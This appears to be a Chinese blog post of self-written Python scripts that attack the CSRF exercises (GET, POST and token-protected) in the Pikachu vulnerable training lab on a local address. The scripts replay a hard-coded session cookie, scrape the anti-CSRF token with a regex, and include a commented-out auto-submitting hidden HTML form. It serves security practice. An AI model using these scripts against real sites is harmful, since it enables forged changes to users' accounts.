当前位置：首页 > news >正文

pikachu自编CSRF(GET),CSRF(POST),CSRF(token)

news 2026/4/28 23:21:09

#与get相似，只是修改了一些请求方式

#这个漏洞产生的验证就是token实时验证，以及前端存在的Cookie验证，需要验证两个

自编CSRF(GET),

import requests from urllib.parse import urlencode target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php" check_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfget/csrf_get.php" #后续检测是否修改 payload = { "sex":"girl", "phonenum":"123456", "add":"CSRF执行成功", "email":"123.COM", "submit":"submit" } query_str = urlencode(payload)#因为+号前后要保持类型一致，需要对字典进行urlencode()编码一下 alert_target = target_url + "?" + query_str print(f"需要发送给用户的链接为:{alert_target}") #模仿用户被攻击 #用户点击被特意构造的payload headers = { "Cookie":"PHPSESSID=df0u2o787mgfgc0avf392ksd7g" } requests.get(target_url, params=payload, headers=headers ) resp = requests.get(check_url,headers=headers) print("[+] 注入完成 ") print("[+] 检查注入是否成功: ","CSRF执行成功" in resp.text)

CSRF(POST),

#与get相似，只是修改了一些请求方式 import requests target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" get_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post.php" payload = { "sex":"girl", "phonenum":"123456", "add":"CSRF的POST攻击", "email":"qq.com", "submit":"submit" } #构造攻击的url,模仿被攻击 Session = requests.Session() headers ={ "Cookie":"PHPSESSID=49mmcmofpdtoh0vn7jvkoj13r2" } requests.post(target_url, data=payload, headers=headers) # resp = requests.get(get_url, headers=headers) print("[+] 攻击完成 ") if "123456" in resp.text: print("[+] 查看是否注入成功！ ") else: print("[-] 注入失败 ！" )

CSRF(token)

#这个漏洞产生的验证就是token实时验证，以及前端存在的Cookie验证，需要验证两个 """ get构造 # 拼接成可攻击的URL evil_url = target_url + "?" + urlencode(payload) payload = target_ul + "?" + urlencode(payload) """ import requests import re # target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get_edit.php" # # payload = { # "sex":"girl", # "phonenum":"123456", # "add":"CSRF-token", # "email":"321@qq.com", # "submit":"submit" # } # # html = ''' # <form action="http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="POST"> # <input type="hidden" name="sex" value="girl"> # <input type="hidden" name="phonenum" value="123456"> # <input type="hidden" name="add" value="CSRF-POST"> # <input type="hidden" name="email" value="123@qq.com"> # <input type="hidden" name="submit" value="submit"> # </form> # <script>document.forms[0].submit()</script> # ''' # # with open("CSRF_token.html","w",encoding = "utf-8") as f: # f.write(html) # # print("[+] 攻击脚本已写好CSRF_token.html") #假设中招了 target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get_edit.php" get_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get.php" session = requests.Session() headers = { "Cookie": "PHPSESSID=if9t2mbpc5c5rf83p1slcn7748" } session.get(get_url, headers=headers) target_get = session.get(url=target_url, headers=headers) token = re.search(r'name="token" value="(.*?)"',target_get.text).group(1) print(f"[+] 已获取实时Token:{token}") payload = { "sex":"girl", "phonenum":"123456", "add":"CSRF-token", "email":"321@qq.com", "token":token, "submit":"submit" } # resp = requests.get(get_url,headers=headers) session.post(url=target_url, data=payload, headers=headers) session.get(target_url, headers=headers) resp = session.get(url=get_url, headers=headers) print("[+] 注入成功") print("[+] 检查测是否正常注入: ", "CSRF-token" in resp.text)

查看全文

http://www.jsqmd.com/news/716196/